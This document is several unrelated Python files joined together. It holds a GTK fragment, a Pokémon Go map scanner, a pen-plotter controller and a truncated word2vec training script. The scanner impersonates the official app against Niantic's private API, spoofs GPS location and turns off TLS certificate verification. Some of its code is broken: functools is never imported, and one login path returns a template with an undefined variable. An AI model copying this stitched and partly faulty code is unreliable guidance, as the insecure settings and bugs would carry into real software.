if tree_iter is None:
self.simulate_click_button.set_sensitive(False)
self.delete_pixel_button.set_sensitive(False)
else:
if not self.simulate_click_button.get_sensitive():
self.simulate_click_button.set_sensitive(True)
if not self.delete_pixel_button.get_sensitive():
self.delete_pixel_button.set_sensitive(True)
|
example.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import flask
from flask import Flask, render_template
from flask_googlemaps import GoogleMaps
from flask_googlemaps import Map
from flask_googlemaps import icons
import os
import re
import sys
import struct
import json
import requests
import argparse
import getpass
import threading
import werkzeug.serving
import pokemon_pb2
import time
from google.protobuf.internal import encoder
from google.protobuf.message import DecodeError
from s2sphere import *
from datetime import datetime
from geopy.geocoders import GoogleV3
from gpsoauth import perform_master_login, perform_oauth
from geopy.exc import GeocoderTimedOut, GeocoderServiceError
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.adapters import ConnectionError
from requests.models import InvalidURL
from transform import *
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
API_URL = 'https://pgorelease.nianticlabs.com/plfe/rpc'
LOGIN_URL = \
'https://sso.pokemon.com/sso/login?service=https://sso.pokemon.com/sso/oauth2.0/callbackAuthorize'
LOGIN_OAUTH = 'https://sso.pokemon.com/sso/oauth2.0/accessToken'
APP = 'com.nianticlabs.pokemongo'
with open('credentials.json') as file:
credentials = json.load(file)
PTC_CLIENT_SECRET = credentials.get('ptc_client_secret', None)
ANDROID_ID = credentials.get('android_id', None)
SERVICE = credentials.get('service', None)
CLIENT_SIG = credentials.get('client_sig', None)
GOOGLEMAPS_KEY = credentials.get('gmaps_key', None)
SESSION = requests.session()
SESSION.headers.update({'User-Agent': 'Niantic App'})
SESSION.verify = False
global_password = None
global_token = None
access_token = None
DEBUG = True
VERBOSE_DEBUG = False # if you want to write raw request/response to the console
COORDS_LATITUDE = 0
COORDS_LONGITUDE = 0
COORDS_ALTITUDE = 0
FLOAT_LAT = 0
FLOAT_LONG = 0
NEXT_LAT = 0
NEXT_LONG = 0
auto_refresh = 0
default_step = 0.001
api_endpoint = None
pokemons = {}
gyms = {}
pokestops = {}
numbertoteam = { # At least I'm pretty sure that's it. I could be wrong and then I'd be displaying the wrong owner team of gyms.
0: 'Gym',
1: 'Mystic',
2: 'Valor',
3: 'Instinct',
}
origin_lat, origin_lon = None, None
is_ampm_clock = False
# stuff for in-background search thread
search_thread = None
def memoize(obj):
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
key = str(args) + str(kwargs)
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
def parse_unicode(bytestring):
decoded_string = bytestring.decode(sys.getfilesystemencoding())
return decoded_string
def debug(message):
if DEBUG:
print '[-] {}'.format(message)
def time_left(ms):
s = ms / 1000
(m, s) = divmod(s, 60)
(h, m) = divmod(m, 60)
return (h, m, s)
def encode(cellid):
output = []
encoder._VarintEncoder()(output.append, cellid)
return ''.join(output)
def getNeighbors():
origin = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
walk = [origin.id()]
# 10 before and 10 after
next = origin.next()
prev = origin.prev()
for i in range(10):
walk.append(prev.id())
walk.append(next.id())
next = next.next()
prev = prev.prev()
return walk
def f2i(float):
return struct.unpack('<Q', struct.pack('<d', float))[0]
def f2h(float):
return hex(struct.unpack('<Q', struct.pack('<d', float))[0])
def h2f(hex):
return struct.unpack('<d', struct.pack('<Q', int(hex, 16)))[0]
def retrying_set_location(location_name):
"""
Continue trying to get co-ords from Google Location until we have them
:param location_name: string to pass to Location API
:return: None
"""
while True:
try:
set_location(location_name)
return
except (GeocoderTimedOut, GeocoderServiceError), e:
debug(
'retrying_set_location: geocoder exception ({}), retrying'.format(
str(e)))
time.sleep(1.25)
def set_location(location_name):
geolocator = GoogleV3()
prog = re.compile('^(\-?\d+(\.\d+)?),\s*(\-?\d+(\.\d+)?)$')
global origin_lat
global origin_lon
if prog.match(location_name):
local_lat, local_lng = [float(x) for x in location_name.split(",")]
alt = 0
origin_lat, origin_lon = local_lat, local_lng
else:
loc = geolocator.geocode(location_name)
origin_lat, origin_lon = local_lat, local_lng = loc.latitude, loc.longitude
alt = loc.altitude
print '[!] Your given location: {}'.format(loc.address.encode('utf-8'))
print('[!] lat/long/alt: {} {} {}'.format(local_lat, local_lng, alt))
set_location_coords(local_lat, local_lng, alt)
def set_location_coords(lat, long, alt):
global COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE
global FLOAT_LAT, FLOAT_LONG
FLOAT_LAT = lat
FLOAT_LONG = long
COORDS_LATITUDE = f2i(lat) # 0x4042bd7c00000000 # f2i(lat)
COORDS_LONGITUDE = f2i(long) # 0xc05e8aae40000000 #f2i(long)
COORDS_ALTITUDE = f2i(alt)
def get_location_coords():
return (COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE)
def retrying_api_req(service, api_endpoint, access_token, *args, **kwargs):
while True:
try:
response = api_req(service, api_endpoint, access_token, *args,
**kwargs)
if response:
return response
debug('retrying_api_req: api_req returned None, retrying')
except (InvalidURL, ConnectionError, DecodeError), e:
debug('retrying_api_req: request error ({}), retrying'.format(
str(e)))
time.sleep(1)
def api_req(service, api_endpoint, access_token, *args, **kwargs):
p_req = pokemon_pb2.RequestEnvelop()
p_req.rpc_id = 1469378659230941192
p_req.unknown1 = 2
(p_req.latitude, p_req.longitude, p_req.altitude) = \
get_location_coords()
p_req.unknown12 = 989
if 'useauth' not in kwargs or not kwargs['useauth']:
p_req.auth.provider = service
p_req.auth.token.contents = access_token
p_req.auth.token.unknown13 = 14
else:
p_req.unknown11.unknown71 = kwargs['useauth'].unknown71
p_req.unknown11.unknown72 = kwargs['useauth'].unknown72
p_req.unknown11.unknown73 = kwargs['useauth'].unknown73
for arg in args:
p_req.MergeFrom(arg)
protobuf = p_req.SerializeToString()
r = SESSION.post(api_endpoint, data=protobuf, verify=False)
p_ret = pokemon_pb2.ResponseEnvelop()
p_ret.ParseFromString(r.content)
if VERBOSE_DEBUG:
print 'REQUEST:'
print p_req
print 'Response:'
print p_ret
print '''
'''
time.sleep(0.51)
return p_ret
def get_api_endpoint(service, access_token, api=API_URL):
profile_response = None
while not profile_response:
profile_response = retrying_get_profile(service, access_token, api,
None)
if not hasattr(profile_response, 'api_url'):
debug(
'retrying_get_profile: get_profile returned no api_url, retrying')
profile_response = None
continue
if not len(profile_response.api_url):
debug(
'get_api_endpoint: retrying_get_profile returned no-len api_url, retrying')
profile_response = None
return 'https://%s/rpc' % profile_response.api_url
def retrying_get_profile(service, access_token, api, useauth, *reqq):
profile_response = None
while not profile_response:
profile_response = get_profile(service, access_token, api, useauth,
*reqq)
if not hasattr(profile_response, 'payload'):
debug(
'retrying_get_profile: get_profile returned no payload, retrying')
profile_response = None
continue
if not profile_response.payload:
debug(
'retrying_get_profile: get_profile returned no-len payload, retrying')
profile_response = None
return profile_response
def get_profile(service, access_token, api, useauth, *reqq):
req = pokemon_pb2.RequestEnvelop()
req1 = req.requests.add()
req1.type = 2
if len(reqq) >= 1:
req1.MergeFrom(reqq[0])
req2 = req.requests.add()
req2.type = 126
if len(reqq) >= 2:
req2.MergeFrom(reqq[1])
req3 = req.requests.add()
req3.type = 4
if len(reqq) >= 3:
req3.MergeFrom(reqq[2])
req4 = req.requests.add()
req4.type = 129
if len(reqq) >= 4:
req4.MergeFrom(reqq[3])
req5 = req.requests.add()
req5.type = 5
if len(reqq) >= 5:
req5.MergeFrom(reqq[4])
return retrying_api_req(service, api, access_token, req, useauth=useauth)
def login_google(username, password):
print '[!] Google login for: {}'.format(username)
r1 = perform_master_login(username, password, ANDROID_ID)
r2 = perform_oauth(username,
r1.get('Token', ''),
ANDROID_ID,
SERVICE,
APP,
CLIENT_SIG, )
return r2.get('Auth')
def login_ptc(username, password):
print '[!] PTC login for: {}'.format(username)
head = {'User-Agent': 'Niantic App'}
r = SESSION.get(LOGIN_URL, headers=head)
if r is None:
return render_template('nope.html', fullmap=fullmap)
try:
jdata = json.loads(r.content)
except ValueError, e:
debug('login_ptc: could not decode JSON from {}'.format(r.content))
return None
# Maximum password length is 15 (sign in page enforces this limit, API does not)
if len(password) > 15:
print '[!] Trimming password to 15 characters'
password = password[:15]
data = {
'lt': jdata['lt'],
'execution': jdata['execution'],
'_eventId': 'submit',
'username': username,
'password': password,
}
r1 = SESSION.post(LOGIN_URL, data=data, headers=head)
ticket = None
try:
ticket = re.sub('.*ticket=', '', r1.history[0].headers['Location'])
except Exception, e:
if DEBUG:
print r1.json()['errors'][0]
return None
data1 = {
'client_id': 'mobile-app_pokemon-go',
'redirect_uri': 'https://www.nianticlabs.com/pokemongo/error',
'client_secret': PTC_CLIENT_SECRET,
'grant_type': 'refresh_token',
'code': ticket,
}
r2 = SESSION.post(LOGIN_OAUTH, data=data1)
access_token = re.sub('&expires.*', '', r2.content)
access_token = re.sub('.*access_token=', '', access_token)
return access_token
def get_heartbeat(service,
api_endpoint,
access_token,
response, ):
m4 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleInt()
m.f1 = int(time.time() * 1000)
m4.message = m.SerializeToString()
m5 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleString()
m.bytes = '05daf51635c82611d1aac95c0b051d3ec088a930'
m5.message = m.SerializeToString()
walk = sorted(getNeighbors())
m1 = pokemon_pb2.RequestEnvelop.Requests()
m1.type = 106
m = pokemon_pb2.RequestEnvelop.MessageQuad()
m.f1 = ''.join(map(encode, walk))
m.f2 = \
"\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
m.lat = COORDS_LATITUDE
m.long = COORDS_LONGITUDE
m1.message = m.SerializeToString()
response = get_profile(service,
access_token,
api_endpoint,
response.unknown7,
m1,
pokemon_pb2.RequestEnvelop.Requests(),
m4,
pokemon_pb2.RequestEnvelop.Requests(),
m5, )
try:
payload = response.payload[0]
except (AttributeError, IndexError):
return
heartbeat = pokemon_pb2.ResponseEnvelop.HeartbeatPayload()
heartbeat.ParseFromString(payload)
return heartbeat
def get_token(service, username, password):
"""
Get token if it's not None
:return:
:rtype:
"""
global global_token
if global_token is None:
if service == 'ptc':
global_token = login_ptc(username, password)
else:
global_token = login_google(username, password)
return global_token
else:
return global_token
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'-a', '--auth_service', type=str.lower, help='Auth Service', default='ptc')
parser.add_argument('-u', '--username', help='Username', required=True)
parser.add_argument('-p', '--password', help='Password', required=False)
parser.add_argument(
'-l', '--location', type=parse_unicode, help='Location', required=True)
parser.add_argument('-st', '--step-limit', help='Steps', required=True)
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument(
'-i', '--ignore', help='Comma-separated list of Pokémon names or IDs to ignore')
group.add_argument(
'-o', '--only', help='Comma-separated list of Pokémon names or IDs to search')
parser.add_argument(
"-ar",
"--auto_refresh",
help="Enables an autorefresh that behaves the same as a page reload. " +
"Needs an integer value for the amount of seconds")
parser.add_argument(
'-dp',
'--display-pokestop',
help='Display pokéstop',
action='store_true',
default=False)
parser.add_argument(
'-dg',
'--display-gym',
help='Display Gym',
action='store_true',
default=False)
parser.add_argument(
'-H',
'--host',
help='Set web server listening host',
default='127.0.0.1')
parser.add_argument(
'-P',
'--port',
type=int,
help='Set web server listening port',
default=5000)
parser.add_argument(
"-L",
"--locale",
help="Locale for Pokemon names: default en, check locale folder for more options",
default="en")
parser.add_argument(
"-ol",
"--onlylure",
help='Display only lured pokéstop',
action='store_true')
parser.add_argument(
'-c',
'--china',
help='Coordinates transformer for China',
action='store_true')
parser.add_argument(
"-pm",
"--ampm_clock",
help="Toggles the AM/PM clock for Pokemon timers",
action='store_true',
default=False)
parser.add_argument(
'-d', '--debug', help='Debug Mode', action='store_true')
parser.set_defaults(DEBUG=True)
return parser.parse_args()
@memoize
def login(args):
global global_password
if not global_password:
if args.password:
global_password = args.password
else:
global_password = getpass.getpass()
access_token = get_token(args.auth_service, args.username, global_password)
if access_token is None:
raise Exception('[-] Wrong username/password')
print '[+] RPC Session Token: {} ...'.format(access_token[:25])
api_endpoint = get_api_endpoint(args.auth_service, access_token)
if api_endpoint is None:
raise Exception('[-] RPC server offline')
print '[+] Received API endpoint: {}'.format(api_endpoint)
profile_response = retrying_get_profile(args.auth_service, access_token,
api_endpoint, None)
if profile_response is None or not profile_response.payload:
raise Exception('Could not get profile')
print '[+] Login successful'
payload = profile_response.payload[0]
profile = pokemon_pb2.ResponseEnvelop.ProfilePayload()
profile.ParseFromString(payload)
print '[+] Username: {}'.format(profile.profile.username)
creation_time = \
datetime.fromtimestamp(int(profile.profile.creation_time)
/ 1000)
print '[+] You started playing Pokemon Go on: {}'.format(
creation_time.strftime('%Y-%m-%d %H:%M:%S'))
for curr in profile.profile.currency:
print '[+] {}: {}'.format(curr.type, curr.amount)
return api_endpoint, access_token, profile_response
def main():
full_path = os.path.realpath(__file__)
(path, filename) = os.path.split(full_path)
args = get_args()
if args.auth_service not in ['ptc', 'google']:
print '[!] Invalid Auth service specified'
return
print('[+] Locale is ' + args.locale)
pokemonsJSON = json.load(
open(path + '/locales/pokemon.' + args.locale + '.json'))
if args.debug:
global DEBUG
DEBUG = True
print '[!] DEBUG mode on'
# only get location for first run
if not (FLOAT_LAT and FLOAT_LONG):
print('[+] Getting initial location')
retrying_set_location(args.location)
if args.auto_refresh:
global auto_refresh
auto_refresh = int(args.auto_refresh) * 1000
if args.ampm_clock:
global is_ampm_clock
is_ampm_clock = True
api_endpoint, access_token, profile_response = login(args)
clear_stale_pokemons()
steplimit = int(args.step_limit)
ignore = []
only = []
if args.ignore:
ignore = [i.lower().strip() for i in args.ignore.split(',')]
elif args.only:
only = [i.lower().strip() for i in args.only.split(',')]
pos = 1
x = 0
y = 0
dx = 0
dy = -1
steplimit2 = steplimit**2
for step in range(steplimit2):
#starting at 0 index
debug('looping: step {} of {}'.format((step+1), steplimit**2))
#debug('steplimit: {} x: {} y: {} pos: {} dx: {} dy {}'.format(steplimit2, x, y, pos, dx, dy))
# Scan location math
if -steplimit2 / 2 < x <= steplimit2 / 2 and -steplimit2 / 2 < y <= steplimit2 / 2:
set_location_coords(x * 0.0025 + origin_lat, y * 0.0025 + origin_lon, 0)
if x == y or x < 0 and x == -y or x > 0 and x == 1 - y:
(dx, dy) = (-dy, dx)
(x, y) = (x + dx, y + dy)
process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only)
print('Completed: ' + str(
((step+1) + pos * .25 - .25) / (steplimit2) * 100) + '%')
global NEXT_LAT, NEXT_LONG
if (NEXT_LAT and NEXT_LONG and
(NEXT_LAT != FLOAT_LAT or NEXT_LONG != FLOAT_LONG)):
print('Update to next location %f, %f' % (NEXT_LAT, NEXT_LONG))
set_location_coords(NEXT_LAT, NEXT_LONG, 0)
NEXT_LAT = 0
NEXT_LONG = 0
else:
set_location_coords(origin_lat, origin_lon, 0)
register_background_thread()
def process_step(args, api_endpoint, access_token, profile_response,
pokemonsJSON, ignore, only):
print('[+] Searching for Pokemon at location {} {}'.format(FLOAT_LAT, FLOAT_LONG))
origin = LatLng.from_degrees(FLOAT_LAT, FLOAT_LONG)
step_lat = FLOAT_LAT
step_long = FLOAT_LONG
parent = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
h = get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response)
hs = [h]
seen = {}
for child in parent.children():
latlng = LatLng.from_point(Cell(child).get_center())
set_location_coords(latlng.lat().degrees, latlng.lng().degrees, 0)
hs.append(
get_heartbeat(args.auth_service, api_endpoint, access_token,
profile_response))
set_location_coords(step_lat, step_long, 0)
visible = []
for hh in hs:
try:
for cell in hh.cells:
for wild in cell.WildPokemon:
hash = wild.SpawnPointId;
if hash not in seen.keys() or (seen[hash].TimeTillHiddenMs <= wild.TimeTillHiddenMs):
visible.append(wild)
seen[hash] = wild.TimeTillHiddenMs
if cell.Fort:
for Fort in cell.Fort:
if Fort.Enabled == True:
if args.china:
(Fort.Latitude, Fort.Longitude) = \
transform_from_wgs_to_gcj(Location(Fort.Latitude, Fort.Longitude))
if Fort.GymPoints and args.display_gym:
gyms[Fort.FortId] = [Fort.Team, Fort.Latitude,
Fort.Longitude, Fort.GymPoints]
elif Fort.FortType \
and args.display_pokestop:
expire_time = 0
if Fort.LureInfo.LureExpiresTimestampMs:
expire_time = datetime\
.fromtimestamp(Fort.LureInfo.LureExpiresTimestampMs / 1000.0)\
.strftime("%H:%M:%S")
if (expire_time != 0 or not args.onlylure):
pokestops[Fort.FortId] = [Fort.Latitude,
Fort.Longitude, expire_time]
except AttributeError:
break
for poke in visible:
pokeid = str(poke.pokemon.PokemonId)
pokename = pokemonsJSON[pokeid]
if args.ignore:
if pokename.lower() in ignore or pokeid in ignore:
continue
elif args.only:
if pokename.lower() not in only and pokeid not in only:
continue
disappear_timestamp = time.time() + poke.TimeTillHiddenMs \
/ 1000
if args.china:
(poke.Latitude, poke.Longitude) = \
transform_from_wgs_to_gcj(Location(poke.Latitude,
poke.Longitude))
pokemons[poke.SpawnPointId] = {
"lat": poke.Latitude,
"lng": poke.Longitude,
"disappear_time": disappear_timestamp,
"id": poke.pokemon.PokemonId,
"name": pokename
}
def clear_stale_pokemons():
current_time = time.time()
for pokemon_key in pokemons.keys():
pokemon = pokemons[pokemon_key]
if current_time > pokemon['disappear_time']:
print "[+] removing stale pokemon %s at %f, %f from list" % (
pokemon['name'].encode('utf-8'), pokemon['lat'], pokemon['lng'])
del pokemons[pokemon_key]
def register_background_thread(initial_registration=False):
"""
Start a background thread to search for Pokemon
while Flask is still able to serve requests for the map
:param initial_registration: True if first registration and thread should start immediately, False if it's being called by the finishing thread to schedule a refresh
:return: None
"""
debug('register_background_thread called')
global search_thread
if initial_registration:
if not werkzeug.serving.is_running_from_reloader():
debug(
'register_background_thread: not running inside Flask so not starting thread')
return
if search_thread:
debug(
'register_background_thread: initial registration requested but thread already running')
return
debug('register_background_thread: initial registration')
search_thread = threading.Thread(target=main)
else:
debug('register_background_thread: queueing')
search_thread = threading.Timer(30, main) # delay, in seconds
search_thread.daemon = True
search_thread.name = 'search_thread'
search_thread.start()
def create_app():
app = Flask(__name__, template_folder='templates')
GoogleMaps(app, key=GOOGLEMAPS_KEY)
return app
app = create_app()
@app.route('/data')
def data():
""" Gets all the PokeMarkers via REST """
return json.dumps(get_pokemarkers())
@app.route('/raw_data')
def raw_data():
""" Gets raw data for pokemons/gyms/pokestops via REST """
return flask.jsonify(pokemons=pokemons, gyms=gyms, pokestops=pokestops)
@app.route('/config')
def config():
""" Gets the settings for the Google Maps via REST"""
center = {
'lat': FLOAT_LAT,
'lng': FLOAT_LONG,
'zoom': 15,
'identifier': "fullmap"
}
return json.dumps(center)
@app.route('/')
def fullmap():
clear_stale_pokemons()
return render_template(
'example_fullmap.html', key=GOOGLEMAPS_KEY, fullmap=get_map(), auto_refresh=auto_refresh)
@app.route('/next_loc')
def next_loc():
global NEXT_LAT, NEXT_LONG
lat = flask.request.args.get('lat', '')
lon = flask.request.args.get('lon', '')
if not (lat and lon):
print('[-] Invalid next location: %s,%s' % (lat, lon))
else:
print('[+] Saved next location as %s,%s' % (lat, lon))
NEXT_LAT = float(lat)
NEXT_LONG = float(lon)
return 'ok'
def get_pokemarkers():
pokeMarkers = [{
'icon': icons.dots.red,
'lat': origin_lat,
'lng': origin_lon,
'infobox': "Start position",
'type': 'custom',
'key': 'start-position',
'disappear_time': -1
}]
for pokemon_key in pokemons:
pokemon = pokemons[pokemon_key]
datestr = datetime.fromtimestamp(pokemon[
'disappear_time'])
dateoutput = datestr.strftime("%H:%M:%S")
if is_ampm_clock:
dateoutput = datestr.strftime("%I:%M%p").lstrip('0')
pokemon['disappear_time_formatted'] = dateoutput
LABEL_TMPL = u'''
<div><b>{name}</b><span> - </span><small><a href='http://www.pokemon.com/us/pokedex/{id}' target='_blank' title='View in Pokedex'>#{id}</a></small></div>
<div>Disappears at - {disappear_time_formatted} <span class='label-countdown' disappears-at='{disappear_time}'></span></div>
<div><a href='https://www.google.com/maps/dir/Current+Location/{lat},{lng}' target='_blank' title='View in Maps'>Get Directions</a></div>
'''
label = LABEL_TMPL.format(**pokemon)
# NOTE: `infobox` field doesn't render multiple line string in frontend
label = label.replace('\n', '')
pokeMarkers.append({
'type': 'pokemon',
'key': pokemon_key,
'disappear_time': pokemon['disappear_time'],
'icon': 'static/icons/%d.png' % pokemon["id"],
'lat': pokemon["lat"],
'lng': pokemon["lng"],
'infobox': label
})
for gym_key in gyms:
gym = gyms[gym_key]
if gym[0] == 0:
color = "rgba(0,0,0,.4)"
if gym[0] == 1:
color = "rgba(74, 138, 202, .6)"
if gym[0] == 2:
color = "rgba(240, 68, 58, .6)"
if gym[0] == 3:
color = "rgba(254, 217, 40, .6)"
icon = 'static/forts/'+numbertoteam[gym[0]]+'_large.png'
pokeMarkers.append({
'icon': 'static/forts/' + numbertoteam[gym[0]] + '.png',
'type': 'gym',
'key': gym_key,
'disappear_time': -1,
'lat': gym[1],
'lng': gym[2],
'infobox': "<div><center><small>Gym owned by:</small><br><b style='color:" + color + "'>Team " + numbertoteam[gym[0]] + "</b><br><img id='" + numbertoteam[gym[0]] + "' height='100px' src='"+icon+"'><br>Prestige: " + str(gym[3]) + "</center>"
})
for stop_key in pokestops:
stop = pokestops[stop_key]
if stop[2] > 0:
pokeMarkers.append({
'type': 'lured_stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/PstopLured.png',
'lat': stop[0],
'lng': stop[1],
'infobox': 'Lured Pokestop, expires at ' + stop[2],
})
else:
pokeMarkers.append({
'type': 'stop',
'key': stop_key,
'disappear_time': -1,
'icon': 'static/forts/Pstop.png',
'lat': stop[0],
'lng': stop[1],
'infobox': 'Pokestop',
})
return pokeMarkers
def get_map():
fullmap = Map(
identifier="fullmap2",
style='height:100%;width:100%;top:0;left:0;position:absolute;z-index:200;',
lat=origin_lat,
lng=origin_lon,
markers=get_pokemarkers(),
zoom='15', )
return fullmap
if __name__ == '__main__':
args = get_args()
register_background_thread(initial_registration=True)
app.run(debug=True, threaded=True, host=args.host, port=args.port)
|
axirunner.py |
from os import kill
import time
import signal
import atexit
import logging
from queue import Queue
from typing import NoReturn
from multiprocessing import Process, Event
from multiprocessing import Queue as pQueue
from multiprocessing.connection import Connection
from AxiFresco.axifresco import Axifresco, Point, json_to_shapes, draw, Status
axi_thread = None
PAUSE = Event()
ABORT = Event()
draw_q = pQueue()
class RequestTypes:
draw: str = 'draw'
stop: str = 'stop'
pause_resume: str = 'pause'
reset: str = 'reset'
home: str = 'home'
def is_axidraw_alive():
return axi_thread is not None and axi_thread.is_alive()
def axidraw_runner(draw_q: pQueue, pause_event: Event, abort_event: Event, status_pipe: Connection):
# create the axidraw handler and set the resolution
ax = Axifresco({}, resolution=20,
unsafe=True,
pause_event=pause_event,
abort_event=abort_event,
status_pipe=status_pipe)
def exit_cleanly():
logging.info('Shutting down the axidraw before exiting...')
try:
ax.close()
except Exception as e:
logging.error(f'Something wrong occured when trying to exit cleanly:\n{e}')
# try exiting cleanly. Will most likely fail to do so because of
# how the terminate instruction works.
signal.signal(signal.SIGINT, exit_cleanly)
signal.signal(signal.SIGTERM, exit_cleanly)
atexit.register(exit_cleanly)
try:
while True:
if ax.status == Status.STOPPED and draw_q.qsize() > 0:
data = draw_q.get()
status_pipe.send({
'state': Status.PLAYING,
'message': 'Starting a new drawing. Pre-processing shapes...',
'progress': 0
})
# process the data
global_config = data['config']
shapes = data['drawing']
config = global_config['axidraw_options']
spline_res = global_config['spline_res']
margin = global_config['margin']
optimize = global_config['optimize']
format = global_config['format']
activeLayers = global_config['layers']
shapes, aspect_ratio = json_to_shapes(shapes)
shapes = [s for s in shapes if s.layer in activeLayers]
ax.set_format(Point(format['x'], format['y']))
ax.set_config(config)
ax.resolution = spline_res
draw(shapes, aspect_ratio, ax, margin, optimize, preview=False)
else:
time.sleep(0.2)
except:
pass
finally:
exit_cleanly()
def draw_request(data, status_pipe: Connection):
global axi_thread
# Only create a new process if none is running
if axi_thread is None or not axi_thread.is_alive():
axi_thread = Process(target=axidraw_runner, args=(draw_q, PAUSE, ABORT, status_pipe,), daemon=True)
axi_thread.start()
# put the data
draw_q.put(data)
# unset any pause or abort instruction
PAUSE.clear()
ABORT.clear()
def kill_axidraw(status_pipe: Connection):
status_pipe.send({
'state': Status.STOPPED,
'message': 'Axidraw has been stopped. Press play to draw.',
'progress': 0
})
axi_thread.terminate()
def stop_draw(data, status_pipe: Connection):
logging.info('Stopping axidraw...')
global axi_thread
if is_axidraw_alive():
kill_axidraw(status_pipe=status_pipe)
# because the axidraw will most likely have not
# exited cleanly, reset it.
reset_axidraw({}, status_pipe)
else:
logging.warning('The axidraw process is already stopped.')
def pause_resume(data, status_pipe: Connection):
if axi_thread is None or not axi_thread.is_alive():
logging.warning('Cannot pause/resume draw as the axidraw thread is dead.')
if PAUSE.is_set():
logging.info('Resuming draw...')
PAUSE.clear()
status_pipe.send({
'state': Status.PLAYING,
'message': 'Resuming draw...',
'progress': 0
})
else:
logging.info('Pausing draw...')
PAUSE.set()
status_pipe.send({
'state': Status.PAUSED,
'message': 'Axidraw paused. Press Play to resume or Home to send the draw head home.',
'progress': 0
})
def reset_axidraw(data, status_pipe: Connection):
global axi_thread
if is_axidraw_alive():
logging.warning('Axidraw is not stopped. Stopping it first.')
kill_axidraw(status_pipe=status_pipe)
time.sleep(0.2)
logging.info('Resetting the axidraw...')
ax = Axifresco(config={}, unsafe=True, reset=True)
ax.stop_motors()
ax.axidraw.disconnect()
status_pipe.send({
'state': Status.STOPPED,
'message': 'Axidraw has been stopped. Press play to draw.',
'progress': 0
})
def go_home(data, status_pipe: Connection):
if PAUSE.is_set():
logging.info('Aborting and sending axidraw home')
ABORT.set()
status_pipe.send({
'state': Status.STOPPED,
'message': 'Axidraw has been sent home. Press play to draw.',
'progress': 0
})
else:
logging.error('Axidraw is not stopped. Can\'t send home')
process_request = {
RequestTypes.draw: draw_request,
RequestTypes.stop: stop_draw,
RequestTypes.pause_resume: pause_resume,
RequestTypes.reset: reset_axidraw,
RequestTypes.home: go_home,
}
def request_processor(q: Queue, status_pipe: Connection) -> NoReturn:
"""
Process runner for the axidraw server
"""
try:
logging.info('Ready to boogie!')
logging.info(q)
while 1:
request, data = q.get()
try:
process_request[request](data, status_pipe)
except Exception as e:
logging.error(f'Something went terribly wrong:\n{e}')
raise e
time.sleep(0.01)
except KeyboardInterrupt:
stop_draw()
exit(0)
|
word2vec_optimized.py | """Multi-threaded word2vec unbatched skip-gram model.
Trains the model described in:
(Mikolov, et. al.) Efficient Estimation of Word Representations in Vector Space
ICLR 2013.
http://arxiv.org/abs/1301.3781
This model does true SGD (i.e. no minibatching). To do this efficiently, custom
ops are used to sequentially process data within a 'batch'.
The key ops used are:
* skipgram custom op that does input processing.
* neg_train custom op that efficiently calculates and applies the gradient using
true SGD.
"""
import os
import sys
import threading
import time
import tensorflow.python.platform
import numpy as np
import tensorflow as tf
from tensorflow.models.embedding import gen_word2vec as word2vec
flags = tf.app.flags
flags.DEFINE_string("save_path", None, "Directory to write the model.")
flags.DEFINE_string(
"train_data", None,
"Training data. E.g., unzipped file http://mattmahoney.net/dc/text8.zip.")
flags.DEFINE_string(
"eval_data", None, "Analogy questions. "
"https://word2vec.googlecode.com/svn/trunk/questions-words.txt.")
flags.DEFINE_integer("embedding_size", 200, "The embedding dimension size.")
flags.DEFINE_integer(
"epochs_to_train", 15,
"Number of epochs to train. Each epoch processes the training data once "
"completely.")
flags.DEFINE_float("learning_rate", 0.025, "Initial learning rate.")
flags.DEFINE_integer("num_neg_samples", 25,
"Negative samples per training example.")
flags.DEFINE_integer("batch_size", 500,
"Numbers of training examples each step processes "
"(no minibatching).")
flags.DEFINE_integer("concurrent_steps", 12,
"The number of concurrent training steps.")
flags.DEFINE_integer("window_size", 5,
"The number of words to predict to the left and right "
"of the target word.")
flags.DEFINE_integer("min_count", 5,
"The minimum number of word occurrences for it to be "
"included in the vocabulary.")
flags.DEFINE_float("subsample", 1e-3,
"Subsample threshold for word occurrence. Words that appear "
"with higher frequency will be randomly down-sampled. Set "
"to 0 to disable.")
flags.DEFINE_boolean(
"interactive", False,
"If true, enters an IPython interactive session to play with the trained "
"model. E.g., try model.analogy('france', 'paris', 'russia') and "
"model.nearby(['proton', 'elephant', 'maxwell']")
FLAGS = flags.FLAGS
class Options(object):
"""Options used by our word2vec model."""
def __init__(self):
# Model options.
# Embedding dimension.
self.emb_dim = FLAGS.embedding_size
# Training options.
# The training text file.
self.train_data = FLAGS.train_data
# Number of negative samples per example.
self.num_samples = FLAGS.num_neg_samples
# The initial learning rate.
self.learning_rate = FLAGS.learning_rate
# Number of epochs to train. After these many epochs, the learning
# rate decays linearly to zero and the training stops.
self.epochs_to_train = FLAGS.epochs_to_train
# Concurrent training steps.
self.concurrent_steps = FLAGS.concurrent_steps
# Number of examples for one training step.
self.batch_size = FLAGS.batch_size
# The number of words to predict to the left and right of the target word.
self.window_size = FLAGS.window_size
# The minimum number of word occurrences for it to be included in the
# vocabulary.
self.min_count = FLAGS.min_count
# Subsampling threshold for word occurrence.
self.subsample = FLAGS.subsample
# Where to write out summaries.
self.save_path = FLAGS.save_path
# Eval options.
# The text file for eval.
self.eval_data = FLAGS.eval_data
class Word2Vec(object):
"""Word2Vec model (Skipgram)."""
def __init__(self, options, session):
self._options = options
self._session = session
self._word2id = {}
self._id2word = []
self.build_graph()
self.build_eval_graph()
self.save_vocab()
self._read_analogies()
def _read_analogies(self):
"""Reads through the analogy question file.
